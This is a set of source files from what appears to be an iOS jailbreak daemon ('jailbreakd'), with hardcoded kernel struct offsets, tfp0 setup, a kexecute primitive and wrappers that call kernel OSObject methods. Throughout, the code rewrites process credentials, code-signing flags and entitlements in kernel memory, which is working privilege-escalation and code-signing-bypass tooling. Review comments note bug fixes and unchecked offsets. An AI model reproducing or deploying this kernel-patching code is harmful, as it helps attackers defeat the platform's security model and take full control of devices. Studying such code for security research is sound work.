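        valb = NO;
    } else {
        fprintf(stderr, "Error, entitlement value not a boolean\n");
        return nil;
    }

    entitlePid(target, [(NSString *)entName UTF8String], valb);
    return nil;
}

- (NSDictionary *)setcsflags:(NSString *)name message:(NSDictionary *)userInfo {
    pid_t target = [self targetPidFromMessage:userInfo];
    if (target < 0) {
        return nil;
    }
    setcsflags(target);
    return nil;
}
@end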
81 |
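// Obtain tfp0 from host special port 4 (where the exploit published it) and
// set up the kernel-patching helpers.
//
// Returns KERN_SUCCESS when everything is initialised, KERN_FAILURE when:
//   - host_get_special_port() fails, or succeeds but hands back MACH_PORT_NULL
//     (the call reports success when nothing has been stored in slot 4, so the
//     port itself has to be checked);
//   - the KernelBase environment variable is missing or not a hex address
//     (the previous version passed getenv()'s NULL straight into strtoull()).
// The previous version also reported the error through an undeclared `err`;
// the status to report is `ret`.
//
// Side effects: sets the globals tfp0, kernel_base and kernel_slide (computed
// against the unslid arm64 base 0xFFFFFFF007004000) and calls init_jelbrek().
kern_return_t init_tfp0() {
    fprintf(stdout, "[*] Initializing jailbreakd\n");

    kern_return_t ret = host_get_special_port(mach_host_self(), HOST_LOCAL_NODE, 4, &tfp0);
    if (ret != KERN_SUCCESS) {
        fprintf(stderr, "[*] ERROR: host_get_special_port 4: %s\n", mach_error_string(ret));
        return KERN_FAILURE;
    }
    if (tfp0 == MACH_PORT_NULL) {
        fprintf(stderr, "[*] ERROR: host special port 4 is not set; nothing published tfp0\n");
        return KERN_FAILURE;
    }
    NSLog(@"[*] Got tfp0!\n");

    const char *base_text = getenv("KernelBase");
    if (base_text == NULL || *base_text == '\0') {
        fprintf(stderr, "[*] ERROR: KernelBase environment variable is not set\n");
        return KERN_FAILURE;
    }
    char *end = NULL;
    kernel_base = strtoull(base_text, &end, 16);
    if (*end != '\0' || kernel_base == 0) {
        fprintf(stderr, "[*] ERROR: KernelBase '%s' is not a hex address\n", base_text);
        return KERN_FAILURE;
    }
    kernel_slide = kernel_base - 0xFFFFFFF007004000;
    NSLog(@"[*] kaslr slide: 0x%016llx\n", kernel_slide);

    init_jelbrek(tfp0, kernel_base);

    return ret;
}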
101 |
102 |
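// Entry point: obtain tfp0, resolve the kernel addresses the patches need,
// build the kexecute primitive, then serve messages forever.
//
// The previous version ignored init_tfp0()'s result and carried on into
// find_allproc() etc. with tfp0 == MACH_PORT_NULL; every later step is a kernel
// read through that port, so we now exit instead.
int main(int argc, char **argv, char **envp) {
    remove_memory_limit(); //Electra's jailbreakd does this and since I don't wanna run into trouble with memory I'm doing it too
    offsets_init();
    if (init_tfp0() != KERN_SUCCESS) {
        fprintf(stderr, "[*] ERROR: could not initialise kernel access, exiting\n");
        return EXIT_FAILURE;
    }

    //cache addresses: resolve each once, up front
    find_allproc();
    find_add_x0_x0_0x40_ret();
    find_OSBoolean_True();
    find_OSBoolean_False();
    find_zone_map_ref();
    find_osunserializexml();
    find_smalloc();
    init_kexecute();

    term_kernel();

    [[Listener alloc] init]; //allocate a new listener and start listening! (does not return while serving)
    return 0;
}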
124 |
125 | // vim:ft=objc
126 |
--------------------------------------------------------------------------------
/multi_path/jailbreakd/make.sh:
--------------------------------------------------------------------------------
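#!/bin/sh
# Build jailbreakd with Theos and pseudo-sign it with the entitlements in ent.xml.
#
# -e stops at the first failing step: the previous version ran `ldid`
# unconditionally, so a failed build would silently re-sign whatever stale
# jailbreakd binary was left in this directory.
set -eu

make clean
make
cp .theos/obj/debug/jailbreakd jailbreakd
# Sign with the platform/task_for_pid entitlements the daemon needs (see ent.xml).
ldid -Sent.xml jailbreakd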
3 |
--------------------------------------------------------------------------------
/multi_path/jailbreakd/offsetof.c:
--------------------------------------------------------------------------------
// Kernel structure offsets for the arm64 kernel build this jailbreak targets.
//
// NOTE(review): nothing here or in offsetof.h checks the running kernel
// version. A wrong offset turns every kwrite in jelbrek.m/kexecute.m into a
// write to unrelated kernel memory, so re-verify the whole table before reusing
// it on another iOS build. offsetof.h additionally declares
// offsetof_ucred_cr_gid, which has no definition in this file.
unsigned offsetof_p_pid = 0x10; // proc_t::p_pid
unsigned offsetof_task = 0x18; // proc_t::task
unsigned offsetof_p_uid = 0x30; // proc_t::p_uid
unsigned offsetof_p_gid = 0x34; // proc_t::p_gid  (comment previously said p_uid)
unsigned offsetof_p_ruid = 0x38; // proc_t::p_ruid (comment previously said p_uid)
unsigned offsetof_p_rgid = 0x3c; // proc_t::p_rgid (comment previously said p_uid)
unsigned offsetof_p_ucred = 0x100; // proc_t::p_ucred
unsigned offsetof_p_csflags = 0x2a8; // proc_t::p_csflags
unsigned offsetof_itk_self = 0xD8; // task_t::itk_self (convert_task_to_port)
unsigned offsetof_itk_sself = 0xE8; // task_t::itk_sself (task_get_special_port)
unsigned offsetof_itk_bootstrap = 0x2b8; // task_t::itk_bootstrap (task_get_special_port)
unsigned offsetof_itk_space = 0x308; // task_t::itk_space
unsigned offsetof_ip_mscount = 0x9C; // ipc_port_t::ip_mscount (ipc_port_make_send)
unsigned offsetof_ip_srights = 0xA0; // ipc_port_t::ip_srights (ipc_port_make_send)
unsigned offsetof_ip_kobject = 0x68; // ipc_port_t::ip_kobject (kexecute.m redirects this to its fake client)
unsigned offsetof_p_textvp = 0x248; // proc_t::p_textvp
unsigned offsetof_p_textoff = 0x250; // proc_t::p_textoff
unsigned offsetof_p_cputype = 0x2c0; // proc_t::p_cputype
unsigned offsetof_p_cpu_subtype = 0x2c4; // proc_t::p_cpu_subtype
unsigned offsetof_special = 2 * sizeof(long); // host::special
unsigned offsetof_ipc_space_is_table = 0x20; // ipc_space::is_table?..

// struct ucred — get_root() in jelbrek.m zeroes all of these.
unsigned offsetof_ucred_cr_uid = 0x18; // ucred::cr_uid
unsigned offsetof_ucred_cr_ruid = 0x1c; // ucred::cr_ruid
unsigned offsetof_ucred_cr_svuid = 0x20; // ucred::cr_svuid
unsigned offsetof_ucred_cr_ngroups = 0x24; // ucred::cr_ngroups
unsigned offsetof_ucred_cr_groups = 0x28; // ucred::cr_groups (start of the array)
unsigned offsetof_ucred_cr_rgid = 0x68; // ucred::cr_rgid
unsigned offsetof_ucred_cr_svgid = 0x6c; // ucred::cr_svgid

// struct vnode
unsigned offsetof_v_type = 0x70; // vnode::v_type
unsigned offsetof_v_id = 0x74; // vnode::v_id
unsigned offsetof_v_ubcinfo = 0x78; // vnode::v_ubcinfo

unsigned offsetof_ubcinfo_csblobs = 0x50; // ubc_info::csblobs

// struct cs_blob
// NOTE(review): 0x12 and 0x16 are not 4/8-byte aligned, which is unusual for
// an int flags field and an off_t — confirm these two against the target kernel.
unsigned offsetof_csb_cputype = 0x8; // cs_blob::csb_cputype
unsigned offsetof_csb_flags = 0x12; // cs_blob::csb_flags
unsigned offsetof_csb_base_offset = 0x16; // cs_blob::csb_base_offset
unsigned offsetof_csb_entitlements_offset = 0x98; // cs_blob::csb_entitlements
unsigned offsetof_csb_signer_type = 0xA0; // cs_blob::csb_signer_type
unsigned offsetof_csb_platform_binary = 0xA4; // cs_blob::csb_platform_binary
unsigned offsetof_csb_platform_path = 0xA8; // cs_blob::csb_platform_path

unsigned offsetof_t_flags = 0x3a0; // task::t_flags (platformize() sets TF_PLATFORM = 0x400 here)

// mount / special-device bits
unsigned offsetof_v_mount = 0xd8; // vnode::v_mount
unsigned offsetof_v_specinfo = 0x78; // vnode::v_specinfo — same offset as v_ubcinfo; presumably they share a union in struct vnode, confirm
unsigned offsetof_specflags = 0x10; // specinfo::si_flags, presumably — confirm
unsigned offsetof_mnt_flag = 0x70; // mount::mnt_flag
unsigned offsetof_mnt_data = 0x8f8; // mount::mnt_data
52 |
53 |
--------------------------------------------------------------------------------
/multi_path/jailbreakd/offsetof.h:
--------------------------------------------------------------------------------
1 |
/*
 * Kernel struct field offsets used for raw kernel memory reads/writes.
 * The values are defined in offsetof.c and are hardcoded for one kernel
 * build; there is no runtime validation, so a stale offset silently corrupts
 * or misreads the wrong field. Every offset must be re-derived per build.
 */

/* struct proc / struct task / struct ipc_port */
extern unsigned offsetof_p_pid;
extern unsigned offsetof_task;
extern unsigned offsetof_p_uid;
extern unsigned offsetof_p_gid;
extern unsigned offsetof_p_ruid;
extern unsigned offsetof_p_rgid;
extern unsigned offsetof_p_ucred;
extern unsigned offsetof_p_csflags;
extern unsigned offsetof_itk_self;
extern unsigned offsetof_itk_sself;
extern unsigned offsetof_itk_bootstrap;
extern unsigned offsetof_itk_space;
extern unsigned offsetof_ip_mscount;
extern unsigned offsetof_ip_srights;
extern unsigned offsetof_ip_kobject;
extern unsigned offsetof_p_textvp;
extern unsigned offsetof_p_textoff;
extern unsigned offsetof_p_cputype;
extern unsigned offsetof_p_cpu_subtype;
extern unsigned offsetof_special;
extern unsigned offsetof_ipc_space_is_table;

/* struct ucred (credentials: rewriting these is a privilege change) */
extern unsigned offsetof_ucred_cr_uid;
extern unsigned offsetof_ucred_cr_ruid;
extern unsigned offsetof_ucred_cr_gid;
extern unsigned offsetof_ucred_cr_rgid;
extern unsigned offsetof_ucred_cr_svgid;
extern unsigned offsetof_ucred_cr_groups;
extern unsigned offsetof_ucred_cr_ngroups;
extern unsigned offsetof_ucred_cr_svuid;

/* struct vnode */
extern unsigned offsetof_v_type;
extern unsigned offsetof_v_id;
extern unsigned offsetof_v_ubcinfo;

/* struct ubc_info */
extern unsigned offsetof_ubcinfo_csblobs;

/* struct cs_blob (code-signature blob) */
extern unsigned offsetof_csb_cputype;
extern unsigned offsetof_csb_flags;
extern unsigned offsetof_csb_base_offset;
extern unsigned offsetof_csb_entitlements_offset;
extern unsigned offsetof_csb_signer_type;
extern unsigned offsetof_csb_platform_binary;
extern unsigned offsetof_csb_platform_path;

/* struct task */
extern unsigned offsetof_t_flags;

/* struct vnode / specinfo / mount (remount support) */
extern unsigned offsetof_v_mount;
extern unsigned offsetof_v_specinfo;
extern unsigned offsetof_specflags;
extern unsigned offsetof_mnt_flag;
extern unsigned offsetof_mnt_data;

/*
 * p_csflags bit values, copied from XNU's bsd/sys/codesign.h. This table
 * appears to come from an older XNU (CS_ALLOWED_MACHO is a literal mask here);
 * compare against the target version's header before adding new bits.
 */
#define CS_VALID 0x0000001 /* dynamically valid */
#define CS_ADHOC 0x0000002 /* ad hoc signed */
#define CS_GET_TASK_ALLOW 0x0000004 /* has get-task-allow entitlement */
#define CS_INSTALLER 0x0000008 /* has installer entitlement */

#define CS_HARD 0x0000100 /* don't load invalid pages */
#define CS_KILL 0x0000200 /* kill process if it becomes invalid */
#define CS_CHECK_EXPIRATION 0x0000400 /* force expiration checking */
#define CS_RESTRICT 0x0000800 /* tell dyld to treat restricted */
#define CS_ENFORCEMENT 0x0001000 /* require enforcement */
#define CS_REQUIRE_LV 0x0002000 /* require library validation */
#define CS_ENTITLEMENTS_VALIDATED 0x0004000 /* code signature permits restricted entitlements */

#define CS_ALLOWED_MACHO 0x00ffffe /* presumably the CS_* bits a code directory may set itself — confirm against target XNU */

#define CS_EXEC_SET_HARD 0x0100000 /* set CS_HARD on any exec'ed process */
#define CS_EXEC_SET_KILL 0x0200000 /* set CS_KILL on any exec'ed process */
#define CS_EXEC_SET_ENFORCEMENT 0x0400000 /* set CS_ENFORCEMENT on any exec'ed process */
#define CS_EXEC_SET_INSTALLER 0x0800000 /* set CS_INSTALLER on any exec'ed process */

#define CS_KILLED 0x1000000 /* was killed by kernel for invalidity */
#define CS_DYLD_PLATFORM 0x2000000 /* dyld used to load this is a platform binary */
#define CS_PLATFORM_BINARY 0x4000000 /* this is a platform binary */
#define CS_PLATFORM_PATH 0x8000000 /* platform binary by the fact of path (osx only) */

#define CS_DEBUGGED 0x10000000 /* process is currently or has previously been debugged and allowed to run with invalid pages */
#define CS_SIGNED 0x20000000 /* process has a signature (may have gone invalid) */
#define CS_DEV_CODE 0x40000000 /* code is dev signed, cannot be loaded into prod signed code (will go away with rdar://problem/28322552) */
83 |
84 |
--------------------------------------------------------------------------------
/multi_path/jailbreakd/offsets.h:
--------------------------------------------------------------------------------
#ifndef offsets_h
#define offsets_h

/*
 * Indices into the per-kernel-version offset tables in offsets.m
 * (kstruct_offsets_11_0 / kstruct_offsets_11_3). Each enumerator is a
 * positional index (`offsets[offset]`), so the order here MUST match the
 * initializer order of those tables: inserting an enumerator without editing
 * both tables shifts every later lookup onto the wrong field.
 */
enum kstruct_offset {
    /* struct task */
    KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,
    KSTRUCT_OFFSET_TASK_REF_COUNT,
    KSTRUCT_OFFSET_TASK_ACTIVE,
    KSTRUCT_OFFSET_TASK_VM_MAP,
    KSTRUCT_OFFSET_TASK_NEXT,
    KSTRUCT_OFFSET_TASK_PREV,
    KSTRUCT_OFFSET_TASK_ITK_SPACE,
    KSTRUCT_OFFSET_TASK_BSD_INFO,

    /* struct ipc_port */
    KSTRUCT_OFFSET_IPC_PORT_IO_BITS,
    KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES,
    KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE,
    KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT,
    KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER,
    KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT,
    KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG,
    KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT,
    KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS,

    /* struct proc */
    KSTRUCT_OFFSET_PROC_PID,
    KSTRUCT_OFFSET_PROC_P_FD,

    /* struct filedesc */
    KSTRUCT_OFFSET_FILEDESC_FD_OFILES,

    /* struct fileproc */
    KSTRUCT_OFFSET_FILEPROC_F_FGLOB,

    /* struct fileglob */
    KSTRUCT_OFFSET_FILEGLOB_FG_DATA,

    /* struct socket */
    KSTRUCT_OFFSET_SOCKET_SO_PCB,

    /* struct pipe */
    KSTRUCT_OFFSET_PIPE_BUFFER,

    /* struct ipc_space */
    KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE,
    KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE,

    /* Not a struct member. Its meaning is not documented here; it is the only
       entry whose value differs between the 11.0 and 11.3 tables in offsets.m
       (0x6c vs 0x7c). Keep it last: it doubles as the table's upper bound. */
    KFREE_ADDR_OFFSET,
};

/* Byte offset for `offset` from the active table; 0 before offsets_init(). */
int koffset(enum kstruct_offset offset);
/* Selects the offset table koffset() reads from (see offsets.m). */
void offsets_init(void);

#endif
56 |
--------------------------------------------------------------------------------
/multi_path/jailbreakd/offsets.m:
--------------------------------------------------------------------------------
1 | #import
2 |
3 | #include
4 | #include
5 | #include
6 | #include
7 | #include
8 |
9 | #include "offsets.h"
10 |
/* Active offset table (one of the kstruct_offsets_* arrays below), indexed by
   enum kstruct_offset. NULL until offsets_init() runs. */
int* offsets = NULL;
12 |
/*
 * Struct offsets for iOS 11.0 - 11.2.x kernels, indexed positionally by
 * enum kstruct_offset (offsets.h): the n-th value belongs to the n-th
 * enumerator, so the order must not change independently of the enum.
 * The only entry that differs from kstruct_offsets_11_3 is KFREE_ADDR_OFFSET
 * (0x6c here, 0x7c there).
 */
int kstruct_offsets_11_0[] = {
    0xb, // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,
    0x10, // KSTRUCT_OFFSET_TASK_REF_COUNT,
    0x14, // KSTRUCT_OFFSET_TASK_ACTIVE,
    0x20, // KSTRUCT_OFFSET_TASK_VM_MAP,
    0x28, // KSTRUCT_OFFSET_TASK_NEXT,
    0x30, // KSTRUCT_OFFSET_TASK_PREV,
    0x308, // KSTRUCT_OFFSET_TASK_ITK_SPACE
    0x368, // KSTRUCT_OFFSET_TASK_BSD_INFO,

    0x0, // KSTRUCT_OFFSET_IPC_PORT_IO_BITS,
    0x4, // KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES,
    0x40, // KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE,
    0x50, // KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT,
    0x60, // KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER,
    0x68, // KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT,
    0x88, // KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG,
    0x90, // KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT,
    0xa0, // KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS,

    0x10, // KSTRUCT_OFFSET_PROC_PID,
    0x108, // KSTRUCT_OFFSET_PROC_P_FD

    0x0, // KSTRUCT_OFFSET_FILEDESC_FD_OFILES

    0x8, // KSTRUCT_OFFSET_FILEPROC_F_FGLOB

    0x38, // KSTRUCT_OFFSET_FILEGLOB_FG_DATA

    0x10, // KSTRUCT_OFFSET_SOCKET_SO_PCB

    0x10, // KSTRUCT_OFFSET_PIPE_BUFFER

    0x14, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE
    0x20, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE

    0x6c, // KFREE_ADDR_OFFSET (the one version-specific entry)
};
51 |
/*
 * Struct offsets for iOS 11.3.x kernels, indexed positionally by
 * enum kstruct_offset (offsets.h); same ordering rule as the 11.0 table.
 * Identical to kstruct_offsets_11_0 except for KFREE_ADDR_OFFSET (0x7c).
 * offsets_init() currently installs this table unconditionally.
 */
int kstruct_offsets_11_3[] = {
    0xb, // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,
    0x10, // KSTRUCT_OFFSET_TASK_REF_COUNT,
    0x14, // KSTRUCT_OFFSET_TASK_ACTIVE,
    0x20, // KSTRUCT_OFFSET_TASK_VM_MAP,
    0x28, // KSTRUCT_OFFSET_TASK_NEXT,
    0x30, // KSTRUCT_OFFSET_TASK_PREV,
    0x308, // KSTRUCT_OFFSET_TASK_ITK_SPACE
    0x368, // KSTRUCT_OFFSET_TASK_BSD_INFO,

    0x0, // KSTRUCT_OFFSET_IPC_PORT_IO_BITS,
    0x4, // KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES,
    0x40, // KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE,
    0x50, // KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT,
    0x60, // KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER,
    0x68, // KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT,
    0x88, // KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG,
    0x90, // KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT,
    0xa0, // KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS,

    0x10, // KSTRUCT_OFFSET_PROC_PID,
    0x108, // KSTRUCT_OFFSET_PROC_P_FD

    0x0, // KSTRUCT_OFFSET_FILEDESC_FD_OFILES

    0x8, // KSTRUCT_OFFSET_FILEPROC_F_FGLOB

    0x38, // KSTRUCT_OFFSET_FILEGLOB_FG_DATA

    0x10, // KSTRUCT_OFFSET_SOCKET_SO_PCB

    0x10, // KSTRUCT_OFFSET_PIPE_BUFFER

    0x14, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE
    0x20, // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE

    0x7c, // KFREE_ADDR_OFFSET (the one version-specific entry)
};
90 |
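/*
 * Look up one kernel struct offset from the table chosen by offsets_init().
 *
 * @param offset  enumerator from kstruct_offset (offsets.h); it indexes the
 *                active table positionally.
 * @return the offset in bytes, or 0 if offsets_init() has not been called or
 *         `offset` is outside the table. Callers that add the result to a
 *         kernel pointer must treat 0 as "not available", not as a field at
 *         offset zero.
 *
 * The range check is new: the tables are sized by the enum and
 * KFREE_ADDR_OFFSET is its last member, so any larger value (e.g. a cast from
 * an untrusted int) would read past the end of the table and hand back an
 * arbitrary number to be used as a kernel offset.
 */
int koffset(enum kstruct_offset offset) {
    if (offsets == NULL) {
        printf("need to call offsets_init() prior to querying offsets\n");
        return 0;
    }
    if ((int)offset < 0 || offset > KFREE_ADDR_OFFSET) {
        printf("koffset: index %d is outside the offset table\n", (int)offset);
        return 0;
    }
    return offsets[offset];
}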
98 |
99 |
/*
 * Choose the offset table that koffset() reads from.
 *
 * The @available-based version selection below is commented out: as shipped,
 * this always installs the iOS 11.3 table regardless of the running kernel,
 * and the "patched in 11.4" bail-out never runs. On an 11.0 - 11.2.x device
 * the one entry that differs between the tables (KFREE_ADDR_OFFSET, 0x6c vs
 * 0x7c) would be wrong; every other koffset() value is identical in both.
 * Re-enable the gate, or check the kernel version some other way, before
 * running this on anything other than 11.3.x.
 */
void offsets_init() {
    /* if (@available(iOS 11.4, *)) {
    printf("this bug is patched in iOS 11.4 and above\n");
    exit(EXIT_FAILURE);
    } else if (@available(iOS 11.3, *)) {
    printf("offsets selected for iOS 11.3 or above\n");
    offsets = kstruct_offsets_11_3;
    } else if (@available(iOS 11.0, *)) {
    printf("offsets selected for iOS 11.0 to 11.2.6\n");
    offsets = kstruct_offsets_11_0;
    } else {
    printf("iOS version too low, 11.0 required\n");
    exit(EXIT_FAILURE);
    }*/
    // Unconditional: the 11.3 table only (see note above).
    offsets = kstruct_offsets_11_3;
}
116 |
--------------------------------------------------------------------------------
/multi_path/jailbreakd/osobject.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include "kexecute.h"
3 | #include "kern_utils.h"
4 | #include "patchfinder64.h"
5 | #include "osobject.h"
6 |
7 | // offsets in vtable:
// offsets in vtable: slot index * pointer size, i.e. the byte offset of each
// virtual method inside the class's vtable. Hardcoded for one kernel build —
// on a different build the slot may hold a different method, in which case
// kexecute() silently calls the wrong kernel function with these arguments.
static uint32_t off_OSDictionary_SetObjectWithCharP = sizeof(void*) * 0x1F;
static uint32_t off_OSDictionary_GetObjectWithCharP = sizeof(void*) * 0x26;
static uint32_t off_OSDictionary_Merge = sizeof(void*) * 0x23;

static uint32_t off_OSArray_Merge = sizeof(void*) * 0x1E;
static uint32_t off_OSArray_RemoveObject = sizeof(void*) * 0x20;
static uint32_t off_OSArray_GetObject = sizeof(void*) * 0x22;

// OSObject reference counting. Release/Retain/GetRetainCount are distinct
// slots; dispatching through the wrong one changes the object's refcount.
static uint32_t off_OSObject_Release = sizeof(void*) * 0x05;
static uint32_t off_OSObject_GetRetainCount = sizeof(void*) * 0x03;
static uint32_t off_OSObject_Retain = sizeof(void*) * 0x04;

static uint32_t off_OSString_GetLength = sizeof(void*) * 0x11;
21 |
/*
 * Call OSDictionary::setObject(const char *, ...) on a kernel dictionary.
 *
 * The key is staged in a temporary kernel allocation (kalloc + kwrite) for
 * the duration of the call and freed afterwards; `val` is passed through as
 * the object pointer untouched.
 *
 * @param dict  kernel address of the OSDictionary
 * @param key   NUL-terminated key, copied into kernel memory
 * @param val   kernel address of the value object
 * @return the callee's result truncated to int: 1 on success, 0 on error
 */
int OSDictionary_SetItem(uint64_t dict, const char *key, uint64_t val) {
    size_t key_len = strlen(key) + 1; // include the terminator

    uint64_t kernel_key = kalloc(key_len);
    kwrite(kernel_key, key, key_len);

    // Resolve the virtual slot through the object's own vtable.
    uint64_t vtable = kread64(dict);
    uint64_t set_object = kread64(vtable + off_OSDictionary_SetObjectWithCharP);

    int result = (int) kexecute(set_object, dict, kernel_key, val, 0, 0, 0, 0);

    kfree(kernel_key, key_len);
    return result;
}
38 |
/*
 * Raw OSDictionary::getObject(const char *) call.
 *
 * Only the low 32 bits of the kernel's return value come back through the
 * trap (see kexecute), so the result is an int widened to uint64_t, not a
 * usable pointer: use OSDictionary_GetItem(), which runs it through
 * zm_fix_addr(). XXX a real object whose low 32 bits happen to be zero is
 * indistinguishable from "not found"; a safer check would be to fix the
 * address up and verify that kread64() of it yields a plausible vtable.
 *
 * @return low 32 bits of the object pointer (sign-extended), or 0 if absent
 */
uint64_t _OSDictionary_GetItem(uint64_t dict, const char *key) {
    size_t key_len = strlen(key) + 1;

    uint64_t kernel_key = kalloc(key_len);
    kwrite(kernel_key, key, key_len);

    uint64_t vtable = kread64(dict);
    uint64_t get_object = kread64(vtable + off_OSDictionary_GetObjectWithCharP);

    int low_bits = (int) kexecute(get_object, dict, kernel_key, 0, 0, 0, 0, 0);

    kfree(kernel_key, key_len);
    return (uint64_t) low_bits;
}
59 |
/*
 * Look up `key` in a kernel OSDictionary and return the object's kernel
 * address, or 0 if it is not present.
 *
 * XXX assumes the object lives in the zone map: zm_fix_addr() presumably
 * reconstructs the upper 32 bits from the zone map (only the low 32 bits
 * survive the trap). 0 is passed through unchanged.
 */
uint64_t OSDictionary_GetItem(uint64_t dict, const char *key) {
    uint64_t raw = _OSDictionary_GetItem(dict, key);
    return raw == 0 ? 0 : zm_fix_addr(raw);
}
70 |
/*
 * OSDictionary::merge(aDict) on kernel objects: copies aDict's entries into
 * dict. Both arguments are kernel addresses.
 *
 * @return 1 on success, 0 on error (callee result truncated to int)
 */
int OSDictionary_Merge(uint64_t dict, uint64_t aDict) {
    uint64_t merge_fn = kread64(kread64(dict) + off_OSDictionary_Merge);
    return (int) kexecute(merge_fn, dict, aDict, 0, 0, 0, 0, 0);
}
78 |
/*
 * OSArray::merge(aArray) on kernel objects: appends aArray's elements to
 * array. Both arguments are kernel addresses.
 *
 * @return 1 on success, 0 on error (callee result truncated to int)
 */
int OSArray_Merge(uint64_t array, uint64_t aArray) {
    uint64_t merge_fn = kread64(kread64(array) + off_OSArray_Merge);
    return (int) kexecute(merge_fn, array, aArray, 0, 0, 0, 0, 0);
}
86 |
/*
 * Raw OSArray::getObject(idx) call. As with the other getters only the low
 * 32 bits of the returned pointer are meaningful; OSArray_GetObject() fixes
 * the address up. No bounds check is done here — the kernel method decides
 * what an out-of-range idx yields.
 */
uint64_t _OSArray_GetObject(uint64_t array, unsigned int idx){
    uint64_t get_object_fn = kread64(kread64(array) + off_OSArray_GetObject);
    return kexecute(get_object_fn, array, idx, 0, 0, 0, 0, 0);
}
93 |
/*
 * Kernel address of element `idx` of a kernel OSArray, or 0 if the raw call
 * returned nothing. XXX assumes the element lives in the zone map (see
 * zm_fix_addr); 0 is passed through unchanged.
 */
uint64_t OSArray_GetObject(uint64_t array, unsigned int idx){
    uint64_t raw = _OSArray_GetObject(array, idx);
    return raw == 0 ? 0 : zm_fix_addr(raw);
}
103 |
/*
 * OSArray::removeObject(idx) on a kernel array. The return value of the
 * kernel call is discarded; an out-of-range idx is left to the kernel method.
 */
void OSArray_RemoveObject(uint64_t array, unsigned int idx){
    uint64_t remove_fn = kread64(kread64(array) + off_OSArray_RemoveObject);
    (void) kexecute(remove_fn, array, idx, 0, 0, 0, 0, 0);
}
110 |
/*
 * Raw call of the kernel's OSUnserializeXML on a NUL-terminated plist/XML
 * string: the buffer is copied into a kernel allocation, parsed, and the
 * allocation freed again.
 *
 * The second argument (OSString **errorString in XNU) is passed as 0/NULL,
 * so parse errors are not reported — XXX failure is only visible as a 0
 * result. As with the getters, only the low 32 bits of the returned object
 * pointer survive the trap; use OSUnserializeXML() for a fixed-up address.
 */
uint64_t _OSUnserializeXML(const char* buffer) {
    size_t xml_len = strlen(buffer) + 1;

    uint64_t kernel_xml = kalloc(xml_len);
    kwrite(kernel_xml, buffer, xml_len);

    uint64_t parsed = kexecute(find_osunserializexml(), kernel_xml, 0, 0, 0, 0, 0, 0);

    kfree(kernel_xml, xml_len);
    return parsed;
}
125 |
/*
 * Parse `buffer` in the kernel with OSUnserializeXML and return the kernel
 * address of the resulting object, or 0 on failure. XXX assumes the object
 * lives in the zone map (see zm_fix_addr); 0 is passed through unchanged.
 */
uint64_t OSUnserializeXML(const char* buffer) {
    uint64_t raw = _OSUnserializeXML(buffer);
    return raw == 0 ? 0 : zm_fix_addr(raw);
}
136 |
/*
 * Drop one reference on a kernel OSObject via its virtual release(). Releasing
 * an object this code does not own frees it under the kernel — pair every
 * call with a retain or a creation (e.g. OSUnserializeXML).
 */
void OSObject_Release(uint64_t osobject) {
    uint64_t release_fn = kread64(kread64(osobject) + off_OSObject_Release);
    (void) kexecute(release_fn, osobject, 0, 0, 0, 0, 0, 0);
}
142 |
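/*
 * Take one reference on a kernel OSObject via its virtual retain().
 *
 * Bug fixed: this dispatched through off_OSObject_Release, so every "retain"
 * actually dropped a reference. Combined with a later OSObject_Release that
 * is a double release — the kernel frees the object while it is still in use
 * (use-after-free in kernel memory). The slot is now off_OSObject_Retain.
 */
void OSObject_Retain(uint64_t osobject) {
    uint64_t vtab = kread64(osobject);
    uint64_t f = kread64(vtab + off_OSObject_Retain);
    (void) kexecute(f, osobject, 0, 0, 0, 0, 0, 0);
}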
148 |
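/*
 * Read a kernel OSObject's retain count via its virtual getRetainCount().
 *
 * Bug fixed: this dispatched through off_OSObject_Release, so asking for the
 * count silently dropped a reference (potentially freeing the object) and
 * returned release()'s result, not a count. The slot is now
 * off_OSObject_GetRetainCount.
 *
 * @return the retain count as returned through the trap (low 32 bits)
 */
uint32_t OSObject_GetRetainCount(uint64_t osobject) {
    uint64_t vtab = kread64(osobject);
    uint64_t f = kread64(vtab + off_OSObject_GetRetainCount);
    return (uint32_t) kexecute(f, osobject, 0, 0, 0, 0, 0, 0);
}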
154 |
/*
 * OSString::getLength() on a kernel string: the number of bytes, not counting
 * the terminator, as returned through the trap (low 32 bits).
 */
unsigned int OSString_GetLength(uint64_t osstring){
    uint64_t get_length_fn = kread64(kread64(osstring) + off_OSString_GetLength);
    return (unsigned int) kexecute(get_length_fn, osstring, 0, 0, 0, 0, 0, 0);
}
160 |
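/*
 * Copy the bytes of a kernel OSString into a fresh NUL-terminated userland
 * buffer.
 *
 * @param osstring  kernel address of the OSString
 * @return malloc'd string the caller must free(), or NULL if the allocation
 *         fails (previously the malloc result was written through unchecked).
 *
 * The length comes from kernel memory and is used as-is, but the size
 * arithmetic is done in size_t so that `length + 1` cannot wrap to 0 on
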